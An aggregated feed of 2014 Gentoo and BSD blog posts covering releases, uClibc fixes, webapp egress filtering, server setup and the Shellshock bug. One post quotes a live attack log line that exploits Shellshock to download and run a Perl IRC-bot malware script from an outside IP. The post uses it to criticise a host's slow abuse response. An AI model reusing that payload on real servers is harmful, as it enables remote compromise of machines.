After reboot, you need to recreate the flash plugin:

% flashpluginctl off && flashpluginctl on

Let us know any issues you see with the newer linux emulation layer.

Also, if you run into problems launching / navigating the newer AppCafe, please open bug reports asap. We are working to stabilize that as quickly as possible. Bug reports should be created at bugs.pcbsd.org.


rndc: neither /usr/local/etc/rndc.conf nor /usr/local/etc/rndc.key was found

by Dan Langille via Dan Langille's Other Diary »

In this post, I’m using bind98-9.8.8 from ports on FreeBSD 9.3, in case that helps you. Today, I was adjusting the pgcon.org domain as part of the move from the old server to the new server. This move would also see the website updated to PGCon 2015 and the use of Ansible for configuring that [...]

gelt

by Dan Langille via Dan Langille's Other Diary »

For future reference. This server formed the backbone of just about everything I did. It hosted about 13 domains. Sadly, it was i386 and would not do for ZFS. Copyright (c) 1992-2014 The FreeBSD Project. Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994 The Regents of the University of California. All [...]

FreeBSD 10.1-RC1 Available

by Webmaster Team via FreeBSD News Flash »

The first RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Lilblue Linux: release 20140925. Adventures beyond the land of POSIX.

by blueness via Anthony G. Basile »

It has been four months since my last major build and release of Lilblue Linux, a pet project of mine [1].  The name is a bit pretentious, I admit, since Lilblue is not some other Linux distro.  It is Gentoo, but Gentoo with a twist.  It’s a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  I use it on some of my workstations at the College and at home, like any other desktop, and I know other people that use it too, but the main reason for its existence is that I wanted to push uClibc to its limits and see where things break.  Back in 2011, I got bored of working with the usual set of embedded packages.  So, while my students where writing their exams in Modern OS, I entertained myself just adding more and more packages to a stage3-amd64-hardened system [2] until I had a decent desktop.  After playing with it on and off, I finally polished it where I thought others might enjoy it too and started pushing out releases.  Recently, I found out that the folks behind uselessd [3] used Lilblue as their testing ground. uselessd is another response to systemd [4], something like eudev [5], which I maintain, so the irony here is too much not to mention!  But that’s another story …

There was only one interesting issue about this release.  Generally I try to keep all releases about the same.  I’m not constantly updating the list of packages in @world.  I did remove pulseaudio this time around because it never did work right and I don’t use it.  I’ll fix it in the future, but not yet!  Instead, I concentrated on a much more interesting problem with a new release of e2fsprogs [6].   The problem started when upstream’s commit 58229aaf removed a broken fallback syscall for fallocate64() on systems where the latter is unavailable [7].  There was nothing wrong with this commit, in fact, it was the correct thing to do.  e4defrag.c used to have the following code:

#ifndef HAVE_FALLOCATE64
#warning Using locally defined fallocate syscall interface.

#ifndef __NR_fallocate
#error Your kernel headers dont define __NR_fallocate
#endif

/*
 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */
The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependant and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn’t a problem there, even though it is a Linux specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o since he was worried that some libc might implement posix_fallocate() by brute force writing 0′s.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of  uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know its a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier’s patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3′s don’t use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issues I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc off any mirror [11].


Does your webapp really need network access?

by Flameeyes via Flameeyes's Weblog »

One of the interesting thing that I noticed after shellshock was the amount of probes for vulnerabilities that counted on webapp users to have direct network access. Not only ping to known addresses to just verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or even /dev/tcp connections to give remote shells. The fact that probes are there makes it logical to me to expect that for at least some of the systems these actually worked.

The reason why this piqued my interest is because I realized that most people don't do the one obvious step to mitigate this kind of problems by removing (or at least limiting) the access to the network of their web apps. So I decided it might be a worth idea to describe a moment why you should think of that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive for you to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve the response to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who have looked into Java in the early nougthies probably have heard of the term Application Server, which usually is present in form of Apache Tomcat or IBM WebSphere, but here is essentially the same "actor" for Rails app in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app, that talk with the web server to receive user requests and serve them responses. This essentially mean that in the basic web interaction, there is no network access needed for the application service.

Things gets a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly even my blog needs to talk with some services, to either ping them to tell them that a new post is out, and to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad history of security and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove access to the network from your webapp: SElinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based of the originating (or destination) user. This of course only works if you can isolate your webapps on a separate user, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps in users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. Pretty similar the requirements for phpMyAdmin: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: negate any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly is also HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better. You can put a proxy on your localhost, and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp to never connect directly to the web. Unfortunately that is not straight forward to implement as neither Passenger not php-fpm has a clean way to pass environment variables per users.

What I've done is for now is to hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still out for a solution for PHP unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it'll make two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll be soon shutting down both implementations since I really don't need it. Indeed the Publify development still seems to go toward the "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect me to go back to it any time soon.

sthttpd: a very tiny and very fast http server with a mature codebase!

by blueness via Anthony G. Basile »

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been update in about 10 years and there were dozens of accumulated patches on the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done” whatever that meant, so I was going to tree clean it.  I expressed my intentions on the upstream mailing list when I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patch.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mail list going [3], and set up bugzilla [4].  There hasn’t been much activity but there was enough because it got noticed by someone who pushed it out in OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com>  from OpenSUSE fixed a possible DOS triggered by specially crafted .htpasswd. Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed makes it perfect for embedded systems which are near and dear to my heart.  I also make sure it compiles on *BSD and Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.


New laptop Lenovo Thinkpad X1 Carbon 20A7

by Hanno Böck via Hanno's blog »

While I got along well with my Thinkpad T61 laptop, for quite some time I had the plan to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant which is very different from the first one was released early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems rarely shops keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys, instead it has what Lenovo calls an adaptive keyboard: A touch sensitive line which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting them display the normal F-keys works well and not having "real" keys there doesn't feel like a big disadvantage. Beside that Lenovo removed the Caps lock and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it's used to be (small downside), but the </>/| key is where it belongs(big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to ultrabook / integrated design easy changing battery, ram or HD
* No SD card reader
* Have some trouble getting used to the touchpad (however there are lots of possibilities to configure it, I assume by playing with it that'll get better)

It used to be the case that people wrote docs how to get all the hardware in a laptop running on Linux which I did my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernels and xorg packages and most things will be fine". However I thought having a central place where I collect relevant information would be nice so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

phpMyFAQ 2.8.15 Released!

by Thorsten via phpMyFAQ devBlog »

The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.15, the “Oops, we did it again!” release. This release fixes the broken installation introduced with phpMyFAQ 2.8.14 and updates the Farsi translation.

phpMyFAQ 2.8.14 Released!

by Thorsten via phpMyFAQ devBlog »

The phpMyFAQ Team is pleased to announce phpMyFAQ 2.8.14, the “Happy Birthday, Bianca!” release. This release fixes an installation compatibility issue with MySQL 5.1 and MySQL 5.5 introduced with phpMyFAQ 2.8.13. We also fixed some minor issues.

bsdtalk245 - Looking for a new /home

by Mr via bsdtalk »

Just a short update about the server that houses the podcast files.  University IT consolidation has created some unplanned changes, but I hope to have a new server spun up soon.  Also, curious to hear what all of you use for your home directory on the Internet.

File Info: 7Min, 3MB.

Ogg Link: https://archive.org/download/bsdtalk245/bsdtalk245.ogg

Smokeping under Debian with Master-Slave configuration

by ff via some useful things »

Since it happened every time with my master-slave setup that data of new probes does not show up, I am blogging it here for future reference.

Make sure that the Smokeping directory is writable for www-data.

root@orion:/var/lib# ls -la | grep smokeping
drwxrwxr-x  7 smokeping     www-data       4096 Sep 30 16:11 smokeping
Furthermore make sure that the directories and RRD files in the directories have the correct permissions. When Smokeping creates new RRDs they have wrong permissions!

root@orion:/var/lib/smokeping# ll
total 28
drwxrwxr-x  7 smokeping www-data 4096 Sep 30 16:11 ./
drwxr-xr-x 70 root      root     4096 Sep 30 11:56 ../
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:19 Bandwidth/
drwxrwxr-x  2 smokeping www-data 4096 Aug 11 13:45 MultiHost/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 Other/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 S/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:20 __sortercache/
As soon as the permissions are correct, data starts showing up. As you can see there is a *.slave_cache file since one of the slaves is currently sending data. The file is owned by the Apache process because the master-slave-communication uses the Smokeping CGI.

root@orion:/var/lib/smokeping/Bandwidth# ll
total 4076
drwxrwxr-x 2 smokeping www-data    4096 Sep 30 19:23 ./
drwxrwxr-x 7 smokeping www-data    4096 Sep 30 16:11 ../
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~home.rrd
-rw-r--r-- 1 www-data  www-data      78 Sep 30 19:23 Target.home.slave_cache
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:17 Target~sg.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~us.rrd
I hope this helps.


A little positivity goes a long way

by Zach via The Z-Issue »

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken back by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach

Rückkehr des IPJ

by Karsten via Security-Planet.de »

Das Internet Protocol Journal war eines der besten Publikationen im Netzwerk-Sektor. Deshalb war ich recht enttäuscht als dieses im letzten Jahr eingestellt wurde. Um so erfreulicher, dass das IPJ mit neuen Sponsoren neu aufgelegt wurde. So habe ich meine Ausgabe am Wochenende im Briefkasten gehabt.
Noch ist auf der neuen Webseite noch nicht zu finden, wie die Print-Ausgabe aboniert werden kann. Die Online-Version kann aber — wie früher auch — online herunter geladen werden.
Die Haupt-Themen der aktuellen Ausgabe sind

  • Gigabit Wi-Fi
  • A Question of DNS Protocols

PostgreSQL Ebuilds Unified

by titanofold via titanofold »

I’ve finished making the move to unified PostgreSQL ebuilds in my overlay. Please give it a go and report any problems there.

Also, I know the comments are disabled. I have 27,186 comments to moderate. All of them are spam. I don’t want to deal with it.

(See my previous post on the topic for why.)

Bye bye Feedburner

by ff via some useful things »

Da mir die Verwendung von Feedburner keinen Mehrwert mehr bringt, habe ich die Feeds wieder auf die Original-Wordpress-Feeds umgestellt. Die Adresse des RSS-Feedss lautet nun: https://nodomain.cc/feed

Bitte aktualisiert eure Feedreader!


Responsibility in running Internet infrastructure

by Hanno Böck via Hanno's blog »

If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.

On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

What does #shellshock mean for Gentoo?

by Flameeyes via Flameeyes's Weblog »


Photo credit: Liam Quinn
This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid this repeats. And that's a difficult topic, because a 25 years old bug is not easy to avoid, especially because there are probably plenty of siblings of it around, that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this to either happen or at least avoid that they escalate so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I've pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one I find very much good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is half unsolved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to use dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash
That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately as I said it's mostly safe. I even found that some of the init scripts I wrote, that I checked with checkbashisms did not work as intended with dash, fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, I found out when it broke my Puppet setup.

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it only has one reference implementation, but it also seem to convince other people, new to coding, that it's a good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25 years old bug is enough to think twice about all of them, o I'll keep my options open.

This is actually why I like software biodiversity: it allows to have options to select different options when one components fail, and that is what worries me the most with systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a proper librarised implementation. But that's probably hoping too much.

FreeBSD 10.1-BETA3 Available

by Webmaster Team via FreeBSD News Flash »

The third BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Rechtsstreit mit einem Geist

by Jesco Freund via My Universe »

Das Update auf die jüngste Ghost Version 0.5.2 birgt einige Tücken — meine eigene Installationsanleitung deckt einige der neu hinzugekommenen Schwierigkeiten nicht ab, wobei selbige überwiegend daraus entstehen, dass der Geist bei mir unter FreeBSD seinen Dienst tun muss.

Die erste Hürde bestand in einer endlos langen Liste an Fehlermeldungen, ausgeworfen von einem harmlosen npm install --production. Obwohl Ghost bei mir für den Einsatz mit PostgreSQL konfiguriert ist, erzwingt es nun den Bau der SQLite Module, deren Abhängigkeiten natürlich nicht installiert waren — ein vermeintlich leicht zu behebendes Problem:

pkg update && pkg upgrade  
pkg ins sqlite3 py27-sqlite3  
Damit war zwar die Gestalt der Fehlermeldung verändert, gebannt war sie jedoch nicht. Bei tiefergehender Wühltätigkeit in den Fehlerlogs und diverser JSON- und JavaScript-Dateien durfte ich dann feststellen, dass an irgendeiner Stelle der Pfad für den Python-Interpreter hart verdrahtet gewesen sein muss, so dass die Umgebungsvariable PYTHON in diesem Fall gar nicht zum Tragen kam und ignoriert wurde.

Die Lösung des Problems ist recht simpel — ein Symlink löst das Problem (wenn auch nicht sehr elegant):

cd /usr/local/bin  
ln -s python2 python  
Danach bauten alle Abhängigkeiten jedenfalls anstandslos durch, und manuell (per npm start oder node index.js) ließ sich Ghost auch ohne weiteres starten. Doch hier fing der wirklich lustige Teil erst an, denn Supervisor konnte Ghost nicht dazu bewegen, sich nicht selbst sofort wieder zu beenden, was zu solch skurrilen Log-Einträgen führte:

2014-09-27 15:06:42,973 INFO spawned: 'ghost' with pid 40876  
2014-09-27 15:06:43,027 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:44,092 INFO spawned: 'ghost' with pid 40877  
2014-09-27 15:06:44,146 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:46,240 INFO spawned: 'ghost' with pid 40879  
2014-09-27 15:06:46,295 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:49,600 INFO spawned: 'ghost' with pid 40883  
2014-09-27 15:06:49,655 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:50,678 INFO gave up: ghost entered FATAL state, too many start retries too quickly  
Der Ghost-Prozess verabschiedete sich also umgehend wieder mit Exit-Status 0. Ja, richtig verstanden, Ghost macht die Grätsche, meldet aber, normal beendet worden zu sein. Und da Ghost von der Kommandozeile anstandslos startete und funktionierte, suchte ich die Schuld natürlich beim supervisord — vergeblich, wie ich im Nachhinein feststellen durfte.

Es war der renitente Geist, der sich (wieder mal) ungehorsam gegenüber seinem Prozess-Aufseher gab. Mangels klarer Ursache für dieses Verhalten half auch hier nur die Analyse von Logfiles (bedingt) und des Quellcodes. Stein des Anstoßes waren letztlich die Berechtigungen im content-Verzeichnis der Ghost Installation.

Während die Unterverzeichnisse data und images schon immer Schreibrechte für den Geist verlangten, sah das bei apps und themes anders aus — gerade letzteres durfte in meinem Setup nur gelesen werden, da ich dem ja noch recht unreifen Ghost möglichst wenig Gelegenheit bieten wollte, im Falle einer hackbaren Sicherheitslücke persistenten Schaden anzurichten (wie z. B. bösartiges JavaScript in das Theme einzuschmuggeln).

Temporär lässt sich das seltsame Verhalten von Ghost also abstellen, wenn man ihm die gewünschten Rechte einräumt — doch wie bei einem trotzigen Kind ist Nachgeben in diesem Fall vielleicht nicht die beste Idee. Deshalb habe ich im Ghost Forum einen entsprechenden Diskussionspunkt eröffnet, in der Hoffnung, dass Ghost in einem der nächsten Releases dann still akzeptiert, nicht überall auf der Festplatte herumkritzeln zu dürfen.

Tor-ramdisk 20140925 released

by blueness via Anthony G. Basile »

I’ve been blogging about my non-Gentoo work using my drupal site at http://opensource.dyc.edu/  but since I may be loosing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released 0.2.4.24 with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download: http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download: http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads


I finally have my first Irish credit card, here's why

by Flameeyes via Flameeyes's Weblog »


Photo credit: Images_of_Money
Almost exactly 18 months after moving to Ireland I'm finally bound to receive my first Irish credit card. This took longer than I was expecting but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better start from the top.

First of all, I have already credit cards, Italian ones that as I wrote before, they are not chip'n'pin which causes a major headache in countries such as Ireland (but UK too), where non-chip'n'pin capable cards are not really well supported or understood. This means that they are not viable, even though I have been using them for years and I have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

